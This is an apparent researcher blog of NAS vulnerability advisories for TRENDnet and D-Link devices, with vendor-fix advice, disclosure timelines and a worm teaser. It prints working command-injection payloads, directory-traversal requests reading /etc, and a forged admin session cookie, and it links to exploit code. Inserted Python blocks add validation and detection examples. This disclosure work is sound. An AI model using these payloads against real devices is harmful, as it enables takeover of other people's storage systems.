Thursday, January 22, 2015

[Exploit] TRENDnet TN-200/200 T1 Network Storage System

TRENDnet TN-200/200 T1 Network Storage System
Note: CVE-2014-1628 and CVE-2014-1630 are used in my N.A.S.ty Worm

Vulnerability: Command Injection

CVE: CVE-2014-1628

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to several command injection vulnerabilities, which allow an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that, when executed, grants an attacker full administrative control of the affected system.

—Vulnerable Pages—

POST /cgi-bin/system_mgr.cgi
POST Data - cmd=cgi_log_server&f_enable=1&f_ip=`cmd`

POST /cgi-bin/remote_backup.cgi
POST Data - cmd=cgi_server_test&ip=`cmd`&s_type=2&direction=2&task=Test&keep_exist_file=0&local_path=undefined&incremental=0&encryption=0&rsync_user=Gimppy&rsync_pw=&ssh_user=&ssh_pw=&inc_num=-1

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1630 Bypasses Auth.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (CVE-2014-1630), a remote adversary can call the “/cgi-bin/system_mgr.cgi” or “remote_backup.cgi” CGI program without authentication. This ultimately results in an unauthenticated OS command injection attack, which is demonstrated in the stand-alone proof of concept exploit and the N.A.S.ty worm.

This exploit should work against other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Cross-Site Request Forgery
CVE: CVE-2014-1629

Description
The TRENDnet TN-200/200 T1 is susceptible to several Cross-Site Request Forgery attacks, which allow an attacker to forge HTML forms and execute actions on behalf of the target user.

Attack Requirements
- The victim must have an active web application session.
- The victim must follow a link crafted by an attacker (e.g., by clicking the link directly, or through some other mechanism such as redirection from a malicious site).
- The victim must have the necessary permissions to render and execute the forged HTTP request.

Details
All HTML forms served by the TRENDnet TN-200/200 T1 are susceptible to Cross-Site Request Forgery.

Impact
If an unauthenticated remote attacker is able to fool an authenticated user into clicking a malicious link, the attacker is able to launch an attack that has the capability to compromise the affected system.

Vendor Recommendations

- Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form contains unique tokens.
- In addition to HTML form tokens, HTTP referrer checking should be enabled.
- Require users to re-authenticate before performing an application state change.

Solution
- There currently is not a solution to this problem.
- DO NOT STAY LOGGED INTO THE WEB MANAGEMENT INTERFACE.
- Restrict access to WAN and LAN network services.




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-1630

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allow an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie-based authentication mechanism utilized by TRENDnet storage systems is severely broken and insecure. For example, TRENDnet uses an authentication cookie named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other TRENDnet Network Storage Systems.
- Missing Function Level Access Control (Authentication Bypass) is only present in firmware versions less than 1.02.
- Broken Session Management (insecure username cookie) is present in firmware versions greater than or equal to 1.02.
- The missing function level access control (Auth Bypass) and broken session management vulnerabilities should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-1630 is demonstrated in conjunction with CVE-2014-1628 -  https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Multiple Directory Traversal Vulnerabilities

CVE: CVE-2014-2703

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Directory Traversal attacks, which ultimately allow an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1630 Bypasses Auth.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- Calls to “webfile_mgr.cgi” and “folder_tree.cgi” require authentication. An attacker can circumvent this by utilizing methods described by CVE-2014-1630.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html




—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX


—Directory Listing—

POST /cgi-bin/folder_tree.cgi HTTP/1.1
POST Data - dir=%2Fetc%2F&cmd=cgi_open_&show_file=&chk_flag=1&file_type=all&function_id=upnp_av




Vulnerability: Information Disclosure
CVE: CVE-2014-2704

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Information Disclosure attacks, which allow an attacker to read arbitrary files from the “xml” and “common” directories located in the web root of the affected system.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can access system files located on the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should enforce authentication and authorization before granting access to any file located within the web root.
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.




Disclosure Timeline
- CVE Numbers Assigned - 1/21/2014 and 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/22/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst (@rootHak42) @ Independent Security Evaluators

Wednesday, January 21, 2015

[Black Hat USA 2014 Video] My N.A.S.ty BH briefing!

Black Hat USA 2014
Network Attached Shell: N.A.S.ty Systems that Store Network Accessible Shells

Note: I was sick and talked too much. I ran out of time! It was an honor to speak at both Black Hat USA and Black Hat Europe in the same year (2014). I successfully turned the results I presented at Black Hat USA into a piece of self-replicating malware, which I later presented at Black Hat Europe (Much better presentation imo haha). Source code is currently unavailable for my N.A.S.ty worm prototype, but I expect to release it soon. Check https://github.com/Gimppy042 frequently, as I will be updating it every so often.

[Exploit] D-Link DNS-345 Network Storage System

D-Link DNS-345 Network Storage System
Note: CVE-2014-2691 and CVE-2014-2692 are used in my N.A.S.ty Worm

Vulnerability: Command Injection
CVE: CVE-2014-2691

Description
The D-Link DNS-345 network storage system is susceptible to several command injection attacks, which allow an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that, when executed, grants an attacker full administrative control of the affected system.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 Bypasses Auth.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (below), a remote adversary can call the “/cgi-bin/system_mgr.cgi” program without authentication. This ultimately results in an unauthenticated OS command injection attack, which is demonstrated in the stand-alone proof of concept exploit and the N.A.S.ty worm.

This exploit should work against other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.
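The two recommendations above (and the identical ones in the TRENDnet post) applied to the cgi_log_server request that both advisories show, as an added example that is not the vendor's CGI code: the f_ip field is validated as a literal IP address and the result goes into an argv list rather than a shell command line. The daemon path and flag are assumed placeholders.

```python
# Added example, not the vendor's code. Demonstrates the advisory's
# recommendation for the cmd=cgi_log_server&f_enable=1&f_ip=... request.
import ipaddress
from urllib.parse import parse_qs


def parse_post_body(body: str) -> dict:
    """URL-decode a form body into single-valued parameters."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def unsafe_command_line(params: dict) -> str:
    """The vulnerable pattern: user input concatenated into a shell command.
    Returned as a string only, never executed. With f_ip=`cmd` a shell would
    run the backticked command before the real program ever saw its argument."""
    return "syslogd -R " + params.get("f_ip", "")


def validate_log_server_ip(value: str) -> str:
    """Strict allow-list validation: f_ip must be a literal IPv4/IPv6 address.
    Hostnames, backticks, ';', '|', '$(' and everything else are rejected."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError as exc:
        raise ValueError(f"f_ip is not an IP address: {value!r}") from exc


def build_log_server_argv(body: str) -> list:
    """Hardened handler: validate each field, then build an argv list meant
    for an exec-style API (e.g. subprocess.run without shell=True) so no
    shell ever interprets the values. Daemon path/flag are assumed."""
    params = parse_post_body(body)
    if params.get("cmd") != "cgi_log_server":
        raise ValueError("unexpected cmd")
    if params.get("f_enable") not in ("0", "1"):
        raise ValueError("f_enable must be 0 or 1")
    argv = ["/sbin/syslogd"]  # assumed remote-logging daemon on the device
    if params["f_enable"] == "1":
        argv += ["-R", validate_log_server_ip(params.get("f_ip", ""))]
    return argv
```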

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-2692

Description
The D-Link DNS-345 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allow an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie-based authentication mechanism utilized by D-Link storage systems is severely broken and insecure. For example, D-Link uses an authentication cookie named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other D-Link Network Storage Systems.
- The missing function level access control (Auth Bypass) and broken session management vulnerabilities should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-2692 is demonstrated in conjunction with CVE-2014-2691 - https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Multiple Directory Traversal Vulnerabilities
CVE: CVE-2014-2693

Description
The D-Link DNS-345 network storage system is susceptible to Directory Traversal attacks, which ultimately allow an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 Bypasses Auth.)
- Ability to access TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- The following HTTP requests show how an attacker can read and write to the D-Link DNS-345 filesystem. Remember, while calls to “webfile_mgr.cgi” require authentication, an attacker can circumvent this by utilizing methods described by CVE-2014-2692.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Content-Length: 95
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 53
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html



—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 111
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX



POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Cookie: username=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 194

cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX
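The path canonicalization the Vendor Recommendations call for, applied to the webfile_mgr.cgi and folder_tree.cgi request bodies shown in this post and in the TRENDnet post, as an added example that is not the vendor's code: each path-like parameter is URL-decoded, normalized and checked against the share root /mnt/HD/HD_a2 that the requests start from. The sample bodies are copied from the requests above plus one constructed benign request.

```python
# Added example, not the vendor's code. Lexical canonicalization check for
# the used_dir / path / path1 / dir parameters seen in the requests above.
import posixpath
from urllib.parse import parse_qs

SHARE_ROOT = "/mnt/HD/HD_a2"            # share root the requests above start from
PATH_PARAMS = ("used_dir", "path", "path1", "dir")


def canonicalize(root: str, user_path: str) -> tuple:
    """Normalize root and the user path; relative input is taken under root."""
    root = posixpath.normpath(root)
    candidate = user_path if user_path.startswith("/") else posixpath.join(root, user_path)
    return root, posixpath.normpath(candidate)


def is_inside(root: str, resolved: str) -> bool:
    """True only when resolved is root itself or lies strictly below it."""
    return resolved == root or resolved.startswith(root + "/")


def resolve_share_path(root: str, user_path: str) -> str:
    """Server-side fix: refuse any path that leaves the share root after
    normalization. On the device the result should additionally go through
    realpath() so symlinks inside the share cannot point back out."""
    root, resolved = canonicalize(root, user_path)
    if not is_inside(root, resolved):
        raise ValueError(f"path escapes share root: {user_path!r} -> {resolved}")
    return resolved


def audit_request_body(body: str, root: str = SHARE_ROOT) -> dict:
    """Detection view over a captured POST body: maps each path-like parameter
    to (normalized path, escapes_root). Works on web-server logs that record
    request bodies, or on traffic captured in front of the NAS."""
    params = parse_qs(body, keep_blank_values=True)   # also percent-decodes %2F / %2f
    report = {}
    for name in PATH_PARAMS:
        for raw in params.get(name, []):
            r, resolved = canonicalize(root, raw)
            report[name] = (resolved, not is_inside(r, resolved))
    return report


# Constructed sample set: three bodies copied from the requests above, one benign.
SAMPLE_BODIES = [
    "cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f",
    "cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX",
    "dir=%2Fetc%2F&cmd=cgi_open_&show_file=&chk_flag=1&file_type=all&function_id=upnp_av",
    "cmd=cgi_folder_content&page=1&rp=10&used_dir=%2Fmnt%2FHD%2FHD_a2%2Fphotos%2F",
]


def flagged_bodies(bodies=SAMPLE_BODIES) -> list:
    """Indexes of the bodies containing at least one parameter that escapes root."""
    return [i for i, b in enumerate(bodies)
            if any(escapes for _, escapes in audit_request_body(b).values())]
```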





Disclosure Timeline
- CVE Numbers Assigned - 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/21/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators

[Exploit] N.A.S.ty Worm Demo

N.A.S.ty VIDEO COMING SOON!
PROTOTYPE SOURCE CODE WILL BE RELEASED SOON.

In the interim, check out my brief segment on Hacker Hotshots where I discuss my network storage research and demonstrate the capabilities of self-replicating malware!!!
 

Friday, July 25, 2014

SOHOpelessly Broken - DEFCON Router Hacking Contest

http://sohopelesslybroken.com/

This year at DEFCON 22, for the first time ever, Independent Security Evaluators (ISE) and the Electronic Frontier Foundation (EFF) are hosting a no-holds-barred router hacking competition. You're hereby challenged to compete in one or both tracks of the SOHOpelessly BROKEN contest.


HACK AND GET PAID! #SOHOpelesslyBroken